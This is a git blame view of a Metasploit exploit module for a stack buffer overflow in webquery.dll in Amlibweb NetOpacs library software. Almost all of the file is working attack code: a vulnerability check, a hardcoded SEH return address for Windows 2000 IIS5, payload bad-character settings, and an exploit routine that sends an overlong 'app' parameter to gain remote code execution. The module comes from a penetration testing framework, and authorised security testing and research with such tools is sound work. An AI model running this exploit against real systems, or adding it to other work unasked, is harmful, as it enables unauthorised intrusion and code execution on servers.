Files
metasploit-gs/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

92 lines
2.8 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
2010-08-03 16:17:43 +00:00
'Description' => %q{
This module exploits a stack buffer overflow in Amlib's Amlibweb
2010-08-03 16:17:43 +00:00
Library Management System (NetOpacs). The webquery.dll
API is available through IIS requests. By specifying
an overly long string to the 'app' parameter, SeH can be
reliably overwritten allowing for arbitrary remote code execution.
In addition, it is possible to overwrite EIP by specifying
an arbitrary parameter name with an '=' terminator.
},
2017-11-09 03:00:24 +11:00
'Author' => [ 'aushack' ],
2010-08-03 16:17:43 +00:00
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '66814' ],
2011-11-11 12:04:40 +11:00
[ 'BID', '42293' ],
2010-08-03 16:17:43 +00:00
[ 'URL', 'http://www.aushack.com/advisories/' ],
],
'Privileged' => true,
'DefaultOptions' =>
2010-08-03 16:17:43 +00:00
{
'EXITFUNC' => 'thread',
'AllowWin32SEH' => true
2010-08-03 16:17:43 +00:00
},
'Payload' =>
{
#'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'DisableNops' => 'True',
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
2010-08-03 16:17:43 +00:00
[
2017-11-09 03:00:24 +11:00
# aushack - Tested OK 20100803 w2k IIS5
2010-08-03 16:17:43 +00:00
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2010-08-03', #0day
'DefaultTarget' => 0))
2010-08-03 16:17:43 +00:00
register_options(
[
Opt::RPORT(80),
])
end
def check
connect
2010-08-03 16:17:43 +00:00
rand = Rex::Text.rand_text_alpha(10)
2010-08-03 16:17:43 +00:00
sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")
res = sock.get_once
disconnect
if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)
if ($1 == rand)
return Exploit::CheckCode::Vulnerable
end
end
2010-08-03 16:17:43 +00:00
Exploit::CheckCode::Safe
end
def exploit
connect
seh = generate_seh_payload(target.ret)
2010-08-03 16:17:43 +00:00
buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end